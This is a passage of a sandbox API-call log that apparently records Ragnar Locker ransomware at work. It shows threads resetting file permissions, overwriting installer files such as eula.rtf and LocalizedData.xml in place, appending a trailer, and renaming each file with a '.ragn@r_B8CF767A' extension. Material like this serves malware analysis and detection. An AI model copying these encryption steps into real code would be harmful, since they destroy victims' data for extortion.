dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0175.284] GetProcessHeap () returned 0x3520000 [0175.284] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584b50 | out: hHeap=0x3520000) returned 1 [0175.284] CloseHandle (hObject=0x3bc) returned 1 [0175.292] lstrcpyW (in: lpString1=0x5aff3e4, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" [0175.292] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf.ragn@r_B8CF767A" [0175.292] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 218 os_tid = 0x126c [0175.293] GetNamedSecurityInfoW () returned 0x0 [0175.294] SetEntriesInAclW () returned 0x0 [0175.294] SetNamedSecurityInfoW () returned 0x0 [0175.294] LocalFree (hMem=0x358e748) returned 0x0 [0175.294] LocalFree (hMem=0x358e75c) returned 0x358e75c [0175.294] LocalFree (hMem=0x5d4ff20) returned 0x0 [0175.294] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml")) returned 0x20 [0175.294] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0175.294] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5eff7cc | out: lpFileSize=0x5eff7cc*=79634) returned 1 [0175.294] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x13703, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.294] GetProcessHeap () returned 0x3520000 [0175.294] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584b50 [0175.295] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584b50, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5eff784, lpOverlapped=0x0 | out: lpBuffer=0x3584b50*, lpNumberOfBytesRead=0x5eff784*=0xf, lpOverlapped=0x0) returned 1 [0175.296] VirtualAlloc (lpAddress=0x0, dwSize=0x13712, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0175.297] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.297] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5eff7a0 | out: lpNewFilePointer=0x0) returned 1 [0175.297] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x13712, lpNumberOfBytesRead=0x5eff774, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5eff774*=0x13712, lpOverlapped=0x0) returned 1 [0175.300] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5eff778 | out: lpNewFilePointer=0x0) returned 1 [0175.300] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x13712, nNumberOfBytesToLockHigh=0x0) returned 1 [0175.300] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x13712, lpNumberOfBytesWritten=0x5eff770, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5eff770*=0x13712, lpOverlapped=0x0) returned 1 [0175.301] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x13712, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0175.301] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.302] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x13712, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.302] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0175.302] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5eff7b0, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5eff7b0*=0x100, lpOverlapped=0x0) returned 1 [0175.302] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5eff7b0, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5eff7b0*=0x100, lpOverlapped=0x0) returned 1 [0175.302] WriteFile (in: hFile=0x3bc, lpBuffer=0x5eff7b4*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5eff7b0, lpOverlapped=0x0 | out: lpBuffer=0x5eff7b4*, lpNumberOfBytesWritten=0x5eff7b0*=0xf, lpOverlapped=0x0) returned 1 [0175.302] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0175.302] GetProcessHeap () returned 0x3520000 [0175.302] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584b50 | out: hHeap=0x3520000) returned 1 [0175.302] CloseHandle (hObject=0x3bc) returned 1 [0175.316] lstrcpyW (in: lpString1=0x5eff320, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" [0175.316] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.ragn@r_B8CF767A" [0175.316] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 219 os_tid = 0xf50 [0175.429] GetNamedSecurityInfoW () returned 0x0 [0175.429] SetEntriesInAclW () returned 0x0 [0175.429] SetNamedSecurityInfoW () returned 0x0 [0175.430] LocalFree (hMem=0x358ee18) returned 0x0 [0175.430] LocalFree (hMem=0x358ee2c) returned 0x358ee2c [0175.430] LocalFree (hMem=0x5d4ff20) returned 0x0 [0175.430] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf")) returned 0x20 [0175.430] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0175.430] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5affe24 | out: lpFileSize=0x5affe24*=3046) returned 1 [0175.430] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xbd7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.430] GetProcessHeap () returned 0x3520000 [0175.430] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584d18 [0175.430] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584d18, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5affddc, lpOverlapped=0x0 | out: lpBuffer=0x3584d18*, lpNumberOfBytesRead=0x5affddc*=0xf, lpOverlapped=0x0) returned 1 [0175.432] VirtualAlloc (lpAddress=0x0, dwSize=0xbe6, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0175.432] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.432] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affdf8 | out: lpNewFilePointer=0x0) returned 1 [0175.433] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0xbe6, lpNumberOfBytesRead=0x5affdcc, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5affdcc*=0xbe6, lpOverlapped=0x0) returned 1 [0175.433] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affdd0 | out: lpNewFilePointer=0x0) returned 1 [0175.433] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xbe6, nNumberOfBytesToLockHigh=0x0) returned 1 [0175.433] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0xbe6, lpNumberOfBytesWritten=0x5affdc8, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5affdc8*=0xbe6, lpOverlapped=0x0) returned 1 [0175.433] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xbe6, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0175.433] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.433] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xbe6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.433] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0175.433] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affe08, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5affe08*=0x100, lpOverlapped=0x0) returned 1 [0175.434] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affe08, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5affe08*=0x100, lpOverlapped=0x0) returned 1 [0175.434] WriteFile (in: hFile=0x3bc, lpBuffer=0x5affe0c*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5affe08, lpOverlapped=0x0 | out: lpBuffer=0x5affe0c*, lpNumberOfBytesWritten=0x5affe08*=0xf, lpOverlapped=0x0) returned 1 [0175.434] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0175.434] GetProcessHeap () returned 0x3520000 [0175.434] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584d18 | out: hHeap=0x3520000) returned 1 [0175.434] CloseHandle (hObject=0x3bc) returned 1 [0175.436] lstrcpyW (in: lpString1=0x5aff978, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" [0175.436] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf.ragn@r_B8CF767A" [0175.436] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 220 os_tid = 0x1264 [0175.449] GetNamedSecurityInfoW () returned 0x0 [0175.450] SetEntriesInAclW () returned 0x0 [0175.450] SetNamedSecurityInfoW () returned 0x0 [0175.451] LocalFree (hMem=0x358ee18) returned 0x0 [0175.451] LocalFree (hMem=0x358ee2c) returned 0x358ee2c [0175.451] LocalFree (hMem=0x5d4ff20) returned 0x0 [0175.451] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml")) returned 0x20 [0175.451] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0175.451] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5eff8bc | out: lpFileSize=0x5eff8bc*=79296) returned 1 [0175.451] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x135b1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.451] GetProcessHeap () returned 0x3520000 [0175.451] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584d18 [0175.451] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584d18, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5eff874, lpOverlapped=0x0 | out: lpBuffer=0x3584d18*, lpNumberOfBytesRead=0x5eff874*=0xf, lpOverlapped=0x0) returned 1 [0175.454] VirtualAlloc (lpAddress=0x0, dwSize=0x135c0, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0175.454] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.454] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5eff890 | out: lpNewFilePointer=0x0) returned 1 [0175.454] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x135c0, lpNumberOfBytesRead=0x5eff864, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5eff864*=0x135c0, lpOverlapped=0x0) returned 1 [0175.457] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5eff868 | out: lpNewFilePointer=0x0) returned 1 [0175.458] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x135c0, nNumberOfBytesToLockHigh=0x0) returned 1 [0175.458] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x135c0, lpNumberOfBytesWritten=0x5eff860, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5eff860*=0x135c0, lpOverlapped=0x0) returned 1 [0175.459] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x135c0, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0175.459] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.460] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x135c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.460] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0175.460] WriteFile (in: hFile=0x3bc, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5eff8a0, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5eff8a0*=0x100, lpOverlapped=0x0) returned 1 [0175.460] WriteFile (in: hFile=0x3bc, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5eff8a0, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5eff8a0*=0x100, lpOverlapped=0x0) returned 1 [0175.460] WriteFile (in: hFile=0x3bc, lpBuffer=0x5eff8a4*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5eff8a0, lpOverlapped=0x0 | out: lpBuffer=0x5eff8a4*, lpNumberOfBytesWritten=0x5eff8a0*=0xf, lpOverlapped=0x0) returned 1 [0175.460] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0175.460] GetProcessHeap () returned 0x3520000 [0175.460] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584d18 | out: hHeap=0x3520000) returned 1 [0175.460] CloseHandle (hObject=0x3bc) returned 1 [0175.469] lstrcpyW (in: lpString1=0x5eff410, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" [0175.469] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.ragn@r_B8CF767A" [0175.469] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 221 os_tid = 0x13c4 [0175.645] GetNamedSecurityInfoW () returned 0x0 [0175.646] SetEntriesInAclW () returned 0x0 [0175.646] SetNamedSecurityInfoW () returned 0x0 [0175.647] LocalFree (hMem=0x358ee18) returned 0x0 [0175.647] LocalFree (hMem=0x358ee2c) returned 0x358ee2c [0175.647] LocalFree (hMem=0x5d4ff20) returned 0x0 [0175.647] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf")) returned 0x20 [0175.647] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0175.648] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5aff79c | out: lpFileSize=0x5aff79c*=4040) returned 1 [0175.648] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xfb9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.648] GetProcessHeap () returned 0x3520000 [0175.648] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584d18 [0175.648] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584d18, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5aff754, lpOverlapped=0x0 | out: lpBuffer=0x3584d18*, lpNumberOfBytesRead=0x5aff754*=0xf, lpOverlapped=0x0) returned 1 [0175.651] VirtualAlloc (lpAddress=0x0, dwSize=0xfc8, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0175.651] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.651] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5aff770 | out: lpNewFilePointer=0x0) returned 1 [0175.651] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0xfc8, lpNumberOfBytesRead=0x5aff744, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5aff744*=0xfc8, lpOverlapped=0x0) returned 1 [0175.651] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5aff748 | out: lpNewFilePointer=0x0) returned 1 [0175.652] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xfc8, nNumberOfBytesToLockHigh=0x0) returned 1 [0175.652] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0xfc8, lpNumberOfBytesWritten=0x5aff740, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5aff740*=0xfc8, lpOverlapped=0x0) returned 1 [0175.652] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xfc8, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0175.652] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.652] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xfc8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.652] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0175.653] WriteFile (in: hFile=0x3bc, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5aff780, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5aff780*=0x100, lpOverlapped=0x0) returned 1 [0175.653] WriteFile (in: hFile=0x3bc, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5aff780, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5aff780*=0x100, lpOverlapped=0x0) returned 1 [0175.653] WriteFile (in: hFile=0x3bc, lpBuffer=0x5aff784*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5aff780, lpOverlapped=0x0 | out: lpBuffer=0x5aff784*, lpNumberOfBytesWritten=0x5aff780*=0xf, lpOverlapped=0x0) returned 1 [0175.653] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0175.653] GetProcessHeap () returned 0x3520000 [0175.654] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584d18 | out: hHeap=0x3520000) returned 1 [0175.654] CloseHandle (hObject=0x3bc) returned 1 [0175.655] lstrcpyW (in: lpString1=0x5aff2f0, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" [0175.655] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf.ragn@r_B8CF767A" [0175.655] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1045\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 222 os_tid = 0x134c [0175.662] GetNamedSecurityInfoW () returned 0x0 [0175.662] SetEntriesInAclW () returned 0x0 [0175.663] SetNamedSecurityInfoW () returned 0x0 [0175.668] LocalFree (hMem=0x358ee18) returned 0x0 [0175.668] LocalFree (hMem=0x358ee2c) returned 0x358ee2c [0175.668] LocalFree (hMem=0x5d4ff20) returned 0x0 [0175.668] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml")) returned 0x20 [0175.669] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1045\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1045\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0175.669] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5eff7d8 | out: lpFileSize=0x5eff7d8*=82374) returned 1 [0175.669] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x141b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.669] GetProcessHeap () returned 0x3520000 [0175.669] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584d18 [0175.669] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584d18, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5eff790, lpOverlapped=0x0 | out: lpBuffer=0x3584d18*, lpNumberOfBytesRead=0x5eff790*=0xf, lpOverlapped=0x0) returned 1 [0175.671] VirtualAlloc (lpAddress=0x0, dwSize=0x141c6, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0175.671] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.672] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5eff7ac | out: lpNewFilePointer=0x0) returned 1 [0175.672] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x141c6, lpNumberOfBytesRead=0x5eff780, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5eff780*=0x141c6, lpOverlapped=0x0) returned 1 [0175.680] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5eff784 | out: lpNewFilePointer=0x0) returned 1 [0175.680] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x141c6, nNumberOfBytesToLockHigh=0x0) returned 1 [0175.681] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, 